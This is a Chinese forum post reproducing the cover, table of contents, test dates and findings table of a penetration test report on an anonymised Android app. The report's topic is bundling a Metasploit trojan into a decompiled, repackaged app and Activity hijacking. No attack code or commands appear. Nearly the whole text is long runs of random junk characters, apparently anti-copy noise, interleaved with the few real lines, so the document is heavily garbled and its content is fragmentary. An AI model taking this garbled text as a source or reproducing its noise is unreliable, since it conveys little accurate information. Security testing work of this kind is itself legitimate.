找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4383|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
; M3 a. n0 L; G' V- A" u/ T* m9 p! O* b# }! r

/ g% M W4 P6 V) q/ ?: x6 C0 E5 q ; x7 M5 N, k5 ~7 A
. M: j7 v: ]3 }; Y# ~3 l- r+ ~) z: x, |- x" l

1 g) x9 V8 K7 e( N6 W* N# ] 3 q: }' B! V/ l* ~& _
; P" n. v- [6 ?6 P# E - K5 E' N; n [

0 @6 A' I/ t0 A# O: S/ I, r' M! X 文档编号:                ) H* a1 B7 j# p, N1 R7 f& H% q/ U s 3 Q# i D) |1 | O6 V

' r( l" S9 z, G8 @& E - z0 K$ K9 O5 q

5 Q8 F& V2 o4 ~. e/ |0 D- g) ~. T9 P a9 ^' M$ A: U   0 F0 @+ M% v% H6 x1 }' R0 [( }& [# `8 ]. j4 e

8 {1 W9 t; W' ?. \& t- f$ g4 W: ^- X

/ c6 n, ?& h7 P 4 ?6 v& H7 d* m, \4 z, t   7 m) M8 u2 i( T$ D $ F5 Q \& E9 s; W7 t

' ]% R' H! _3 X8 o# [- j# f* o0 q& W$ Z4 `9 o0 u

! o$ m4 N6 X' c! x8 y, Q! @/ T( Z9 n " J3 J" y. D+ M0 k1 i% O6 G: p   1 @! ]. g1 G' i. }% L2 a: ?# ? 9 X4 H, _" w7 v( `( K

$ W$ r, n- t% ^. _& y( p ) @7 X$ s: ^9 y N

0 A7 V& D# z3 t. T7 I( K 3 P! e+ |7 f3 @+ |0 |7 r; u   ( X, n# z, j- w3 }2 M6 h 1 |2 }2 g4 e! |3 I

5 v9 F5 P% P, m7 p$ T _ $ Y" H0 {' S; A* ?/ Z0 y N! h

% A# z" a J1 r' k/ F( l9 x: x " b# y# _ C7 ~& }   ' ]) H$ V) J# Q, x0 _ + |0 m$ m0 i$ d& j

2 k: }* D* n! F S) m; V% o " g/ w9 u ]& x2 B# Z' N, L; i

- V5 W- \3 N8 h1 z ) F: V1 q' U/ ?( e 某某某APP渗透测试 9 F- n' f3 v2 g6 m8 n8 M# ^: m0 _$ r8 ]! y

3 R2 L5 A6 m7 Q4 r" M- x' H$ x \( x# ^9 P- O7 r2 S, F

/ L- v" g5 G7 i( n" ^" y / j$ n/ j( ?& F1 [   2 u* o" f' Y5 C, L- R9 h" Z* N, n$ k; r* e b- N @. P3 q

7 R+ ?( E: ^% r + R! x$ m4 e$ I( B8 j6 K: Q. Z' K; d

8 V8 R$ g' J+ q9 j, a( R" V; ~) F3 B! H. N% R   & X5 P/ }) R6 `5 F ; n) q( o9 @9 U! L

$ h x. h; c5 a2 `- E8 I4 |7 z1 |7 S& d5 q; b( M( }- _

! p" k( f Q: V4 X4 \; R3 I' o( H; c. n M1 `! ]# ^   $ _# Y, h( i$ I6 S% u) I; X* d# P 6 J1 S- ?: B/ C- S/ @* ?( K

/ O4 X# L t' D4 j 0 A% q8 Y: s4 {& n

) b6 K5 `3 X- r6 _! h2 N# v" [1 @# \   ) c# z" ~, \, O l/ O- K+ H" J : {/ H$ b$ O) J7 V4 [4 }! i. X7 w& ~

: x! K, c. p; b7 g 9 [8 t- ^- v: f: ]' i- f( B' y

% R4 a, ]* N- P6 H5 @* d) A / @6 @& x3 C- T1 H9 l% D7 } 技 术 报 告 ! v5 v, R. e/ p( {$ J5 b( D/ _! `/ [; V' r

8 ]% S8 o9 X. H! f; Q. s8 p 9 r: G8 m$ D: R8 U/ a4 U

+ m) s# W8 T; j: Q' w ! f4 L9 e* y1 G1 E# V   0 X! R( U' A6 t% e ~& l' o' p " i) b& }% L* w( c0 N. a

) k6 \" u( w# g! A% d , H2 P4 X/ y- @. J. m

" _4 }. |2 Q9 h2 R9 t " N3 u2 {. S* H0 c Z9 |   4 ?0 X- e/ a" }2 V, x- z' _4 h" q

1 J1 @) B% m7 _ 5 l m7 A9 y# _: b, J7 U ~6 n

. ?7 {( z4 x4 P% f% { " W6 s5 P. e' I2 b   5 ^# B( C, U) N+ v6 o) [5 t $ Y2 q& o" [! M, @' }* G; S" p& m8 ?$ V

1 [" S" [: e) w; ~$ |! n * G& i5 Z# x# N- n8 e U

% K8 `. H+ B# _( G! ~0 f" B1 J; {# m0 C   / V! D) e) U" ]6 K4 v# L. X F + w8 u' F/ x$ ^; |. ?5 p8 X& l# a

5 l* ?& a+ h2 I9 F + v7 r- i! u0 v- O

" a9 X7 \/ g1 H& p+ ~ ; K% e6 b1 A$ l   : Y1 }% ?: N, U9 g! ?9 g, ~, {; M3 {% |, h

# y8 S0 o2 P$ `& K, B$ w3 }) M * x K' \7 T; @' l. Z2 k

- _( K9 J0 H" k- k y- f / ?( v: U! T8 C% q7 P; [   / Y. t: f7 S s' i% q2 H& D, h- d4 F* }

+ _- k1 P( }, }. s9 D9 y' c8 F G5 K# A5 N& p _. O+ a) i( V

, @% G0 M: |5 @. |* }$ m 2 e* u( }" J5 o+ o( ^9 W- [   * Y) g* D5 N3 R- s: W" i; f & U* y B* N9 X- i% d/ y9 {" k

# \1 g5 W$ @; \ 1 E) d- q4 v+ |1 c' [/ C+ Y7 Q

r+ r* D' Q7 _% S/ m1 ^6 t4 [; t; _/ G" V, [   , X& h: @6 k3 e! O3 G S; R1 o4 t6 o- u# {

! I3 ^; ^3 x, o( _ s7 q & V9 m: t- |' q! v4 d" ], Y

7 y& |- P: I* K" y8 R( g: z& @/ u J( P `( q- U# j   * C, j) V, h( b ; U9 y* ^2 ^9 H0 G

7 U% ]6 }: z+ i0 J- ?$ L( a; P4 z3 `4 M$ }

. l" U8 i# N/ c' i2 ~ / U/ f1 {, Q5 K7 M' b   9 P" m* ~! Y( F$ D; a" U( N; u4 I* p$ b

9 j6 _+ f* e' l 1 y/ G! t& C- i/ X, x

: ~+ B& J' [7 l+ U2 t 6 G1 G- k3 ]% R/ l1 W   # O/ C8 t h' \! S! ^) u ' l# b9 D5 C. I4 [& ?

: ~) _: C2 \8 V3 d H" p 5 x E) e- [6 ^6 R( G

! a3 D Q2 i' M' Z7 f $ L" s7 |( J* k/ V! S( m# z   . ^" ~2 b% ~! [ ! s# O5 }, d' w7 o% @

0 X1 m5 t% d/ ]9 I' ?) ?; {* ~, E/ D% j4 A

9 Q& ?" f' B" i & }& K' T) O: r3 e a6 x# J   # t5 C9 C" N* Z& ?# L8 \8 f ' W5 X( Q* }9 {/ P1 L

! E' z) E6 _% v1 F; t( o8 P : C* ?: M! q7 s, u

; B4 K4 }4 [: h( l B ' b& t) H7 | A9 E* n   " A+ B$ C2 D7 _7 o. a* G J' x! D' @8 c7 B( a

) M3 C S) _+ u1 y# R0 l1 Q : T) x5 n1 @) z0 ?

- l) {5 Q1 l" V, z! a $ B! P; m1 j8 A) \' x2 t7 ~5 M) ]+ E9 e   0 n5 ^; k3 w! ?4 p1 E6 T5 i. W* r& B1 H! _% D

' m5 S4 E' T* C+ w8 j( Z & V' m$ Z6 ~( |- a" w5 ]0 Z

/ d, {/ p8 r. n# u/ p 5 Y. Z. H) Z9 O0 }& V   ! o9 q' v3 n/ [. {7 b6 Z 7 Q! F( E ? w+ t, H* z

$ B) T, ?8 w" l& O/ ]1 F 2 P1 N1 R: E2 w4 S( r; E2 \5 @4 n

' x# w! l% ~) D+ X! P$ H % s, x f+ C @: h1 \/ F3 p   4 V3 u( S; `" G! X' _3 O2 { 3 k V( }1 s4 F9 H/ p

9 l- b7 K& }) w( U5 E3 [ 3 R. k. y) }9 }6 G9 d9 I* X' T

$ k& {5 y6 }: t0 d1 x 6 q" y& a- ]( g! A5 X   6 ?# J N0 a- ^: f: r % M. f: E- N. i# }

6 @5 Z& L9 u6 W. b / @5 Q$ k( J) U7 q. L8 M& W

0 K0 K9 Y& g2 { 7 @( P- b* F' E# z 二〇二〇年 ( O+ C# F) ?1 A) y) ] 1 s& L3 U3 [0 x8 p8 } ~

0 e/ _7 U% {% Y# k, {9 B |- K; f* @6 H: v5 y4 X) t/ R
0 I; F# ]7 |% F$ W# Q* {, J S: V7 X5 u# u' K/ Q0 ^
! y; ?3 d6 ~5 ]& |- c* t; T 6 ]6 V. @" k5 e. T
( r" T3 O, }7 r5 V% W5 T; \ : A5 v: |$ ~( d& G, Q( A! w' i
# f, ^; c! K. y5 ~. b+ Y* ~2 q5 {! v& ~6 \, V, Z" y
3 _% {4 }* L! z3 Y& Z- \% y* F# _9 Y" e' W
9 M2 M) |9 V1 J- X8 O+ X* ^. W' _ 3 |! C' V5 s) u+ i0 `( l
( P& l4 j' m3 N0 p3 p7 M . ?' y' ~5 M0 b5 S2 N8 ?% h l
X) U; x+ ?. c1 j$ W( c. |" R # i" @- O7 i$ b5 ~6 \

5 ^' y& g- `, ~+ X7 Q+ { 4 |: M$ W. c N+ F/ v 目 录 2 D8 f, m( Q% P' i7 h% h* ? ! C+ ^) C. B% T9 ^6 S5 x( o

$ S" r. N6 j- f9 P! y & E( |8 X9 d: L1 q0 v2 l # H& w9 D0 j# J" b# G) q1 W ; T/ ~( W7 r) `, H: a1 n! U' d0 p9 a

& k% V- D0 r3 J6 _ 1 @: D, _" t' s4 y   : X$ G* @. U; w' |# j 0 z Y7 {2 m% ]/ Y! p$ m

; A2 b5 }% h+ e3 d' h- h2 w$ m) m4 E4 p/ o" L

7 a4 |- w6 a, ]' i4 ?# B+ @# \ 8 @$ I& p5 q/ F2 h 1 概述... 3 1 e5 O! n* d5 j m4 W0 e% ^# W; a) V. n

. l$ X) q3 s' Q/ z- w * {( e+ l6 w8 t" E# J( _; b& O

3 a- C& x ~. r# o' f. u/ g9 R7 K : ~4 M+ a* ?2 w6 n 1.2测试时间... 3 3 e' o8 T/ F+ H: {& ^) i1 H2 j% p- ~! U: w; Y' D! R6 J$ l

+ p i* X% B+ P* N. D, m * i' Z" \ b# P

# I' K* c6 g. ?+ w 7 _/ X; W( k' b9 [3 N 1.3测试对象... 3 / b( b: \- g% U" q5 ^ + N- G: D1 H- x& o% ]

/ W- [: O7 ^$ l9 q, Y) ]- k, e3 P, O) ^

6 w/ i9 p# y6 [, V" y8 ^$ S0 c. y. ] 8 Z3 _% c" n- s$ Z0 u 1.4测试结果... 3 4 L% U! P9 a2 L+ y. h 9 _, y; ~4 H* [/ s6 J u! e

# s% ?8 L5 ?; [ h% B $ t# [, F+ L T& X

" S, O8 ^, N6 P$ S9 | ! J& V; m. {/ c6 m0 y( C. K# M, \ 2 检测结果... 4 / ]% n8 R0 W7 C% ^ : d) A8 Y+ y+ s% N8 t

9 n- @! e. d+ H" E7 M5 N& n/ c: K& D1 G" O 6 ^. w: L& j0 o. ]( @

9 E& v5 v; j2 h, B" K% R! O# G2 f % B" K. x ?3 v 2.1 某某某... 4 : `6 S1 R. V7 _* u. z* ]9 s# W' _( L/ h J6 y4 p- n8 V7 ^9 F, o8 T: I

$ _: M; A5 E6 F+ p6 ~4 F( ]1 a ( x0 n8 [; Q! P: {9 H& a

) J3 D& f8 k! G. j6 } Q! D# Q2 r- ~. j, a 2.1.1检测目标... 4 1 Y% T! ~+ S9 O! C! V- K9 h) l9 u( m. M6 M9 f9 `

- R$ b5 Q6 e; c1 R/ Y $ w, m5 t; m8 c4 i# B

0 Y+ \5 `, }" p# n! Z, n 2 ^* }! ~8 @) a* }, l% M2 D! `3 w 2.1.2检测结果... 4 " o( I" O, i" U : L( B2 _" H, N. x1 L! u! j

' S, E! ^8 B7 Y . O! n8 H1 \( `. V( i- q" L

7 D' y9 m# V2 t6 l% x: S + Y9 t" Y, ?; x$ o; {$ v! o 2.1.2.1. 4 ! x) Y1 D8 C% B5 _7 H " z" B) t e" d0 J* }! _' m3 d

2 F6 `6 w: r. E- |4 Z9 K% |9 A- n

?8 p2 A- K* E7 f 1 I! d# h! V3 [ x 2.1.2.2. 6 + n9 C$ H) A2 L$ f# b3 {, s: n 4 b, ~( m3 t) _6 I, ]; ~6 I! n0 O4 N6 ]

0 Z$ X4 H9 Z+ R; i 7 C) G: A1 j$ w# v3 x3 l

/ }$ h4 p R/ T, J( x, d0 f* {6 A* M. O: Y; K0 p . m" [8 R5 g7 @8 \ 8 K: B8 [# v4 l. E

& P4 ?2 \5 S7 s & H" {( d0 }; ]5 }
5 E9 g" q* U% f: ~% U1 | # D, s( D" L( t$ G3 t
8 m' t/ e! U- O & N( h8 T5 I1 g
6 [5 C+ [4 g( \2 L 9 W- h( Q" v T8 D6 \( I- [
; g" t# s8 Y: Y% m! s! c3 q# G0 O" G/ `* A

6 b- a! K' P+ ?% c) W+ `1 F' }# A, l" C! U! j" ^5 R! C: ` 1 概述 + L% E2 s% K! u" Z) T # {8 u5 c" P9 F7 P6 s' d

- i: S% f6 f( x1 |4 A2 z+ J: R3 c- J }/ c. q

( S. y1 r/ f( D$ L4 c " `" F% \' O; z# x2 W: B5 [ 1.2测试时间 4 N( k" H2 k U9 m ) S- j% f$ u# c

- q# b1 O4 A# Y% V 3 _; y K3 i! p% c$ I " C" O, O7 T( N4 l+ M# f, C" n6 h" h# ~; q- g/ n, [, M, u+ R- S: n- K7 ~+ H( U: Z! L! H# Q1 a3 M$ l8 U. h! t/ K1 M! M0 D7 O ~. \ H5 v1 W l+ E( T! }2 s% f& ?+ z" D' p8 f- S5 N0 I! P, S0 j' T% L' Z, {+ N3 w0 M# I5 t$ d4 O" c* ` j& h5 T& p- t2 |% j+ S; w4 ~6 M; _2 H6 k% y4 N0 S; N- [7 t* H9 Q$ E& u# o1 i0 v& u% T c* n- J8 G" S' g* [6 t4 b0 v j$ j# X( R4 Q5 \1 G) q+ g: { H- _" v" b$ e a" L- E/ K* r5 }3 |3 p) r/ G" C" e: q9 f" U- W. A2 b- S) {1 K, y" J5 n4 g2 B& ?. L2 D0 D& |5 S; x9 J0 l1 q) a- _* S( \/ _5 I. a$ _7 h6 z$ p' B% Y8 G, O# E2 E% W+ k6 O& R! F4 e1 s; z+ i$ _0 ?/ S, Y: t- b$ |# h* K- H; X: V0 r+ K; ~. c& n+ n* n' Z8 e0 R, |0 a- M1 v! `8 V4 |3 a
- k: m; V4 b9 `! c' l, ~6 R7 ? - Y7 @" u" W- d+ n6 n1 Q

9 K# U4 X/ E& {# x( B! I$ A" d: v4 h* c7 j# {, @ 渗透测试时间 0 _5 t8 I+ Q. G6 k8 Y 8 \4 M' D2 z/ V) ?6 j

; a( ^5 }* z1 C, L9 _; j1 s* _! w" K5 M5 w. B
; }6 e" C" {% h O. p1 l . ?4 ~0 n; \2 J; b6 p

" Y. w; B& w1 B' T- l: c7 [ : p, {, M. Y3 } 起始时间 ) t9 m- P& `1 u6 w7 t # ?. A/ u# @' {+ a1 E

& ~( n7 J6 i$ C' u0 W" I+ n: s' I0 t5 r4 [
/ G* s* t8 Q3 A' g% X- ~) O & z; {* N' x4 V8 x. D$ d& a

7 s- R; p( \% P 4 x- C% l. E* J* o 202046 4 k4 [9 r8 j4 i5 ]! v* S+ [: R! S 0 o( K4 i0 W1 ]

' U) V- O. F7 k $ V4 X+ ~1 K0 _5 [+ u0 l/ E9 N4 U
' v4 r8 l( [9 p! e5 ` 2 H; O7 W% g0 H/ H4 v. G; v5 P* ?

: t) E6 U0 ] X# i7 ]) a' c # ^, A& U5 b4 l; ^& Q 结束时间 9 o/ p1 m5 Z) {3 w) Q4 T - B9 G# u' g0 a; a

5 i5 m4 L) ] o% a8 E* @8 N# H( g" q8 C% }
a! `- z6 C* N4 D0 x: J2 x$ W! f# v: F

1 M+ h5 w9 m. E6 ~/ n8 S+ ]0 |' D( H1 R8 ^# x( B/ K- L 202049 4 u1 r9 J( R8 I# X" L8 z9 Q# [1 X, K

( J% y1 Z L- g5 U ( Y( A4 v9 d5 J1 {, b
! k, n. a+ G7 j S% o7 {1 D3 M: V" L5 I4 F+ q/ |# F

8 z, Z% {7 o% W1 Q' e 8 L% c, _4 {9 e# H h 1.3测试对象 2 v. \( M( n7 O2 B6 Q# C6 _. F3 Z7 k6 d/ ?- [5 h" w! U

6 f$ j7 |. D7 g' n' a& r' o $ V# K& k3 {8 `! G4 w0 \$ l4 l

! J4 \9 v, I7 K5 o# A/ d. q# j3 }% t* x U; _' V8 p7 e 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 8 A0 y7 E& [, X. `! ]1 [8 Y1 x5 m/ C0 N% t- j% Y

# Q. W, c. X0 K3 c- t* b0 z; z3 p6 j [9 w! O0 e# }5 C: Q# F

$ ~3 t( r# r/ H7 V) J1 C: i + a& Q, _, u r* H! i/ G 1-1 检测对象 0 k* [: R7 @, ^6 x, o & L" w8 f( v5 z0 z5 F

, U" _8 N% }' \: C8 N( O' W( Q+ y6 \/ o4 G+ f # T6 n) N1 q% N! ^8 [3 r0 v2 G3 ^3 F$ V3 L" u T, ]" f) ~" K+ l9 u) w6 K. K( j7 @; V) E$ D5 b3 W4 R w- f0 X- g9 Q3 v8 U" q; n: o4 {7 r' s- j* Q: O/ O- z( X% F: p- c% p! k0 |! ]+ Q* u4 G6 O. F# w% E8 E5 l, L: R' }, C1 B2 t1 c& z1 B2 G0 u/ T$ P2 u( K" b2 {2 N6 U! g: I0 `1 W" x( T# d( h- R3 ^8 v F' y4 T# K$ }. w( ^, k# {( e& @( W, B2 g8 t$ s" l" X+ q7 N! p! y- ?5 Z+ k: u N' J8 V! [ U) o$ ^% j+ A# W5 E5 k+ }3 Y- l1 H9 v/ ^0 k& [) G+ t% B1 Z4 s. h7 a5 x9 J3 O$ H; r, R/ j* u/ k+ O8 x' k0 [# }- V; ]1 \! q4 P+ g# ^ f2 B0 O+ y5 U1 |: j5 U/ l" I0 J L( A& M1 E8 `; |: @& N- s& s2 R; F4 X* J% ?0 |3 m- _, C) J$ R( K# t3 u3 W/ Y- u; y' q" C" W( I, T H5 ~/ z! C" {8 i; X5 L) t! j {% Y0 [$ \) s( P: @
9 X: k+ J o7 S5 I& M / z7 D- u& t$ o& d9 }, z; ~0 x

) u5 K0 o) ~( v M% X- H: W4 I4 E4 M. l7 a) Q% u 序号 6 D8 w, H P9 P, H. @ : d( A& U! N3 ~' E

% V4 a% f+ J, \" V- g: p$ j . j4 f0 Y6 ?0 j3 @: l7 @
. ~$ s* E3 [% [) w3 u( S! n; X } 1 Q- K( s+ X5 |- y. r5 l

0 \8 r9 W/ Z! j9 M% G1 _( m: p* i1 _& q0 M : N4 I1 z- P0 K7 E 测试对象 w" |9 X, `8 s, O& o 3 s- O5 q1 e! G/ e9 e

0 X" L+ e% `6 U. K# z( w. h ; N |8 i' ^: O8 {, j
) d; Y" ~4 ]" o* \. S - I+ H* C! u! j {

g" z; O+ X7 B, r+ ] 6 R s" e8 N% M 测试地址 , N) D t" i4 X3 k3 f1 ?4 `! Q. L6 f7 h* O/ i& v

f& F" n( G- |2 v4 E 4 b; A- ~ b0 a& F
: g$ ?) P8 X8 @0 e ) O) ^& n8 L- \4 c) r

- g% G! g% }, t9 |9 l) N* x! X* Q ( u0 g0 K9 ]- Z2 [. B2 m6 H 安全漏洞 " n6 H) w3 j/ a1 m6 g! F 8 I$ K+ u9 q$ D3 k

( t1 ~( ?* c! [8 ]! m, Q 8 P4 a( D' t9 j5 N( A
+ a9 j! S+ Y1 _! q9 k/ ?) K z, W3 Z* o, c! |7 `- B0 {

8 h2 _8 `- |0 d2 _ ! c% @7 r/ m! h: E3 e, R+ R- M 1 I; K& |" Z% q1 a. X: A + _& |$ Y5 z/ m/ {

) x2 n7 _) L5 F0 f1 n3 S4 S6 G* h1 C, w/ F5 G" r
& J' T! [$ C& F9 b) t& L0 \% w k7 r# x% u9 X/ w1 X3 E. ?* t7 W

/ s- |4 ~. D/ f& P / E- q0 E3 `! I1 @" i 某某某安卓APP & p& W) X$ r$ \ ! C$ k3 E0 g1 [/ ?

6 q+ s" O( L* [2 D7 `. I * Z( n/ f9 M& t$ J
0 ^/ H( R% | ^& p/ h3 N) c6 f) z7 B4 M; o& n& ]5 n

/ m# V( S% \8 i7 Q4 R : `# x* | q: j0 b. J3 k   , J% }: N4 Q/ o; [# m# [ % s! L# ~) P, @$ y3 b/ t; J7 }

: y( `: i/ _- A& t4 D( Y 6 O% H0 X3 k' W# G$ @" _7 i- F
$ I" c+ D+ r1 J4 Q ) i% ?4 W' c/ W

% g9 v$ ~* H/ k7 R3 |$ B6 v* b( m' q % ]* z& q# Z! e# T0 }, i) u2 N 2 " u; n) k! v. ]! b( ?- ]) i % e m. |( M* T. O) l/ q

0 P1 Y- s. {3 J/ i3 U 5 d* a/ s& f3 U* W! w
. v. b5 f1 [4 @0 N, { ' g" c4 W. q6 n+ P6 @: q: J

" z8 C8 }4 w# y1 p 2 c7 i y0 \/ j; V9 t 1.4测试结果 / Y' y% n# G! ] ^- l/ [! t3 a% j9 a) O- Y. p

7 C3 C- J9 k" ~% e& B( I x; z5 v3 d * b7 k. Y. D1 D$ i2 J8 U' f

( }2 G6 r" n0 H7 P/ G* L 8 a2 x7 G( @- l( F 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 8 R6 n8 d* n) ?( h8 v 0 U. ~- ^; i+ |6 E

; C5 s [. z' Q6 m( X% E P" I6 g. T ?" a3 `

1 g' y2 Z; A' C- B+ g: | C 8 q5 }2 X) u9 a# u! e% \& V   # u7 c* F( q6 k' u/ K$ F ' e! v3 m& q. w% t$ i/ ]

$ ]9 Z1 g! b7 C) G% T; {* j. k+ x: ~7 Z6 `& a `+ S! }6 w
8 B+ K. D! d& {5 f, j8 W" T5 y; d3 `3 ^2 i0 M0 i7 I5 W- B . c R! i r1 N( ^9 C; X. U/ t# U8 R+ b- W% I0 p- O- Y4 m4 b7 y1 m, F6 Q( P) M& T$ e( P! ~3 D; f- {& g- N. o2 x5 B) t4 N+ k. { L- s' q, p( ~0 O" t& O/ g' a, ]0 }3 S) |- m) R) w9 \$ V: _: o- c3 P% r4 e+ B! \9 m* A- b' x+ D7 t. e8 Y x o- {" w4 k# i! Q2 u, v( Y9 e6 p) H1 A B R3 E$ E4 l" s8 e6 }7 t- X7 p) R3 B6 p8 r0 b. k7 N% Q/ G" Y- }! y& T" J9 u" T. C% p9 @" r, H( ?% d7 f% W- t8 I/ N# [, X+ g) [. j7 M/ N# C: G' c% S" D) B. x' l/ V" m" d2 G" g) q- k. N' p9 N0 L* e8 c8 i3 w! Z( J% M+ `+ P& V# k% n* o$ T P8 ]7 f! P3 Y# X1 C- ~( X/ s6 v! V8 Y( J' x1 a+ \# _% W9 u9 h/ h1 u% J; u, K3 f1 z8 z) |6 n( ~# r- X1 L; p$ J3 W. a. G- Q7 A# v4 V- g4 H1 f6 h. }6 A+ g: i2 ~( Y2 i4 G. I& y" ?: ` @# H+ v; D' V* H5 X, g2 |! J- N) p; Y& ?9 O8 s& C/ O' Y8 _2 z# \0 ^0 ?8 J* Y. ^8 D, l7 Z& U6 L) E. t4 j" i. H% ^! _; D1 V" P/ Z0 p" E3 p/ y. x- B+ P& p0 j6 s. J3 N' F1 G8 \9 ]8 _# @' y0 `% n# Z6 v( \3 E% z, C* J% l5 N! Z: {( w- E- _- E; ?0 V, x6 j4 R7 O* M' B% D- B$ u( r( N" p5 |5 d- l- c2 }6 K/ ~ K# T2 D" b+ g- Y F9 A3 _* B! E2 u% ?/ d$ s$ m) ~" N/ W0 q& O" v# B1 P+ `+ I D; p* b1 b0 f+ S8 K" T6 V& I8 [1 a5 \5 h3 W! U1 n+ V$ F; k3 I8 N8 p1 N: k0 ^/ [3 Q4 Q
4 d D# Q" o Q$ \1 B: p . {& k* o( I' d. w. ~/ v

/ x2 e, X6 B) H: C8 r 6 a0 X: I* r! b( q, m 序号 : |2 W1 j' Q7 j5 ^1 W' _% c+ E* n+ R, c/ E$ l* T1 E! |

# D' v d- m% B ) E+ ]* D( B# L$ G6 {6 o# t
- Z9 V5 g3 ?" |, _( S5 k, f* u) z% X: |( N2 r( u

5 E. H/ _5 E4 G/ J/ w0 ~/ m2 z& \# v- o% n" T0 Y8 {1 P3 J( w! T T 系统名称 6 O7 k( `9 e6 M0 Z- P; }/ z $ w3 _. n; w7 y8 u3 F

* Z- I5 [: ?; ]- D$ O4 v+ B" z& y% c
9 h0 \" o$ W$ U - b5 j5 o/ D& K5 U9 `$ v

0 z. n2 ]1 c* o* f- m; g, p/ h1 b8 U( |9 t( k/ j( q+ n5 Q( C 漏洞名称 3 Y' ]: ~2 h3 |* d1 E 6 v4 u0 Q( s/ Z& P

' C% v5 ]8 T* o& \1 Q5 ~ n. j0 ^; K2 S8 O4 t' L. `7 i
0 o2 ?" ?/ [6 o1 Y$ o: _& k) @ 3 m' ]( [8 B- W. T# z

9 I3 K3 \+ y. z( c X3 T $ x! Z9 |- Z# e4 v- I/ l 漏洞危害 : i ~$ b- y; `% S. c% g8 K$ Y% ~8 t8 Q/ f }2 i" M6 `

2 S; E7 O6 W7 j% i: t& b: | 0 e4 a3 U7 C# k) c$ ]1 ]
6 z0 C) x, S4 p, U& a " s5 U" g& } {: ]

" R8 m9 |2 u2 m+ k3 ]" ~+ P 6 v$ @6 M1 H2 @0 |2 H! c4 y 修复结果 $ d' Z7 v5 z( U, U7 `' k7 ]/ _9 Z9 E( W

( p3 [- o! v3 h( @ f \- v% ~4 t7 l) ~8 \$ a
6 @4 Z! s) Y/ Q+ M: u# N, J 6 D% D$ q) I+ Z8 I; |" M) G+ O: W

7 f4 t; O+ R4 K% n' I $ Y6 {4 U4 J# J% n8 W8 u 1 : R& ]- ~- \! p; x# K3 p / o( ~0 i7 |: {: I a

% m6 [, K0 T9 A' i& Z& e# a4 M' F7 k) L" ?3 V/ u
- f8 M2 _7 ]" N0 Y7 Y 9 o; S% \$ o8 W' j) c# h

9 b5 r+ S2 T6 r' l : [" C# P8 \$ Y- o7 u7 c 某某某某某某APP ; C7 {; M" a+ Z6 R2 j " M6 w$ Q$ Q2 |( ]8 M

3 j, X4 ^, q2 ^2 ? 6 l. s' Q5 P1 g9 c4 ? G4 Z+ P+ c
5 C& G$ s) o3 M$ C" r9 Q- ^4 {* L% a. M. |# ]" V' F

! w. V3 X+ D' H( B: @( k 8 p& g3 }# n/ V# B9 k Activity 劫持 * J" E( n6 J4 T0 E/ X1 s7 o ( | R7 g) r8 B* T0 b( u6 n

y5 q2 O' F) Q' u ) a7 P8 M% j6 T/ w/ a$ ]* P

6 }" l; K4 U W7 ]' z6 [% ^$ s % L9 B2 A7 u- E+ Y. T   " ]* m$ i r/ T! m5 y. G : M, K7 d9 ~0 O$ U# p' U0 E

& [, D8 R# r; P" l* @8 x& i4 \* c 3 O* j3 T* w* z
, p2 ]' c( I/ }- S# S c/ \5 R 5 ^! C5 ]* F$ d, T8 U' `

, \$ i: h( Z% {% { ! O$ F# B- W1 G & A: m C4 c8 {- J + F& Y0 z$ m3 l; j

6 ~8 O# l1 [( g+ s. D 2 i" E) }2 R% O" r
) h3 d) l* G, Q5 h / y0 c8 F2 W8 H: ^+ X6 C% q" I; K2 w8 m

% {, h% t7 o" |5 y1 A ( d5 o7 s9 y4 b4 U$ A* x0 _8 P1 k   " Y4 {! \# t+ K( _ 9 w3 M% l% C* V7 @. M1 [

. G2 P* h4 x- v8 [( _ / |/ T' ]9 P2 ?* Y* M
. {* o. |# }! s 1 s' Z. L- [/ C3 ]

1 k* Y& B C! Z / m; S* m, o; p0 O2 n: P5 w+ u! U" H 2 4 n4 L. _# u! c; T" w( B# M3 H5 v. f: W, s/ h1 b% \

' m+ g; j) Z+ K1 Q: L% P6 K " c+ }* x7 Z3 R3 X
" U4 r) U1 i3 Q- x ' g% z7 j: p2 r' b& @

, w, i5 `- ?$ d1 L: U1 I* d- e% n8 {8 X. w 某某某某某某APP 1 w* U4 u8 B, L! m ) b% f# x1 I5 ^. D3 h0 n

! s% Q5 F i4 s' j/ |9 x; \, b( V1 ~. n L9 W
: S% [4 z9 P" u- Y' h5 m 1 L; I z: T/ I* V& w

3 p: a3 a# ?6 n; D7 Y( j: s L' T& Q, t2 H 反编译二次打包捆绑木马、篡改APP代码 8 ]3 {$ X# I+ }. ] ! ?. {3 B; `2 {& F

/ x7 Z+ S2 S% d3 f8 d : n F: p$ }7 x: i5 T9 k8 o2 y
& G) }: ]4 A4 [% l% Y" i1 u4 n 8 t% ?1 E# ~/ d$ G9 t) N: J! D; N

[" H, e3 ]! j, r' S' D n! @2 b! B3 K; w5 A g" l- l- n4 M7 y8 v' y$ @7 J+ v. ~2 V% f

( U* n% C; G- C / E" V2 k# c; Z
& D, u) L3 l! ^ 9 ~/ g% O2 X% W" P7 M6 g

f# _' L" @# E ' I# j2 i( }8 h' \7 Q/ K+ c   # z0 |! j4 ^6 x. J" z: i- p6 a$ W5 X0 y% f

3 z2 ]+ Q% L& ] / S$ \9 M. b+ `% W
/ f$ k- d m# ` o0 c0 d' h$ G : s5 r& Y1 \8 N' x( P$ K! M4 t
* _$ k3 ]0 x/ |# e7 d ' A* T4 A. W/ T" @* f% U7 v! D

3 ?7 V4 ~6 i6 Y" [- X9 x5 ^1 h( ^: I0 [4 T8 G! _   * H- d) ~9 i# D3 T/ O& j & P x* S3 C! y. N6 l5 x

4 `" V% Z/ Y* u! [ 0 l7 X. f- l( Q# i

1 H. m* U' R1 d4 W. t/ t 7 p& z2 [7 I8 Y4 C 1-2 测试结果 , |7 Z- U& E' [# h6 i ~. h 9 j3 {% k+ ^# [

: ]" z% H7 p1 x ( q% q. t( R1 N0 ?

: G: F4 E l' Z- e / T1 t& n, g3 a" t   0 W& Y6 u4 O( `; W m. t1 j* _8 o5 q% M# H/ k

